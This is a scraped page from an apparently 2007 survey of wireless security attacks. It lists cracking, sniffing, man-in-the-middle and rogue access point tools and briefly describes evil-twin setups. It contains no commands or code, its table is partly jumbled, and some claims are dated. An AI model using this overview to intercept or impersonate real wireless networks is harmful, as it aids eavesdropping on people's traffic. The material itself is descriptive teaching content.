X hits on this document





4 / 12

Wireless Hacking Tools


Figure 2 shows a screenshot of Wireshark. Each different color indicates a different protocol identified. When the user selects a packet, the details of that packet are displayed below.

The sniffing programs work well for information that is sent in the clear. For encrypted information, an encryption key cracker is necessary. For 802.11, WPA2 is the latest wireless encryption standard that has not been broken yet. WPA and WEP are two previous encryption schemes with many tools available that will crack their encryption keys. AirSnort [6] is a well known for WEP and AirCrack [7] is an attack tools for WPA.

Ettercap [8] and dsniff [9] are two popular man in the middle attack tools. They both provide sniffing capabilities similar to Wireshark, but go beyond that with the ability to modify the data in transmission. Again these are available for many platforms. Ettercap even has a tutorial on how to write your own plugin.

Tools such as Hotspotter [11], APsniff [12], APhunter [13], and KNSGEM [14] will scan for wireless AP beacon signals. Although they are not necessarily attack tools, they can be used to find the wireless APs. KNSGEM will

even place the APs on a Google Earth map. Attackers will then setup their Evil TwinAP near these legitimate ones. HermesAP [15] and OpenAP [16] are two Linux based tools that allow the user to setup phony APs. OpenWRT [17] and HyperWRT [18] are two open source projects that replace the factory firmware for Linksys's popular WRT line of APs. Attackers can use these distributions to create fake APs.

Table 1 - Summary of confidentiality attack tools


Type of Attack

Brute force WEP cracker

Encryption Cracker

WPA cracker

Encryption Cracker

Packet sniffers with traffic analysis. These also include tools to break encryption.

Packet sniffing

Discovers WLANs by listening for beacon signals transmitted from APs.

AP locator




Ettercap, dsniff, and Wireshark

Hotspotter, APsniff, APhunter, and KNSGEM

HermesAP and OpenAP

Used to setup an rogue AP

Evil Twin

OpenWRT and HyperWRT

Replacement firmware so APs can be

Fake AP

programmed to execute creation


Back to Table of Contents

3.0 Integrity Attacks

The idea of an integrity attack is to alter the data while in transmission. Remember the integrity of the data means that it has not been altered in any way. This includes data deletion or addition, frame deletion or addition, or replay

4 of 12

12/19/2007 5:16 PM

Document info
Document views13
Page views13
Page last viewedMon Aug 08 01:54:25 UTC 2016